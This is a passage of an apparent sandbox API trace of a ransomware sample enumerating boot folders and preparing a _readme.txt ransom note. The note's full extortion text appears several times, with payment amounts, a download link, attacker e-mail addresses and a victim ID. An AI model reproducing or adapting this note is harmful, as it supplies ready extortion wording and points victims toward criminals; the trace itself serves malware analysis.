RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.504] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.504] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.504] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.504] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.505] PathFindFileNameW (pszPath="C:\\Boot\\es-ES\\") returned="es-ES\\" [0174.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.505] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0174.506] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0174.506] PathFindFileNameW (pszPath="") returned="" [0174.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.506] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0174.506] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0174.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x800) returned 0x2d2ec90 [0174.506] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0174.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2d154b0 [0174.507] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.507] FreeLibrary (hLibModule=0x759d0000) returned 1 [0174.507] PathAppendW (in: pszPath="C:\\Boot\\es-ES\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 1 [0174.507] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.507] PathFileExistsW (pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 0 [0174.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d30670 [0174.508] lstrcpyW (in: lpString1=0x2d30670, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0174.508] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0174.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d16e48 [0174.509] CreateFileW (lpFileName="C:\\Boot\\es-ES\\_readme.txt" (normalized: "c:\\boot\\es-es\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0174.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d16e48 | out: hHeap=0x6a0000) returned 1 [0174.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30670 | out: hHeap=0x6a0000) returned 1 [0174.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.510] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*" (normalized: "c:\\boot\\es-es\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0174.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.511] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0174.511] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0174.511] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0174.511] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0174.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d276f8 | out: hHeap=0x6a0000) returned 1 [0174.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d276f8 [0174.512] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0174.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.514] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.514] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.514] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0174.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0174.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.518] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0174.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.518] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.518] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.519] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.519] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.519] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.519] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.519] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.519] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.519] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.520] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.520] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.520] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.520] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.521] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.521] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.521] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.521] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0174.521] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.522] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.522] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.522] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0174.522] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.522] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.522] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.522] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.523] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.523] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.523] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.523] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.523] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.524] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.524] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.524] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.524] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.525] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.525] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.525] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.525] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.525] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.525] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.525] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.526] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.526] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.526] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.526] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.526] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.527] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.527] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.527] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.527] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.527] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.527] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.527] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.528] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.528] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.528] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.528] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.528] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.528] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.529] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.529] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.529] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.529] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.529] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0174.529] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.530] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.530] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.530] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.530] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.530] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.531] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.531] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.531] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.531] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.531] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.531] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.531] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.532] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.532] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.532] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 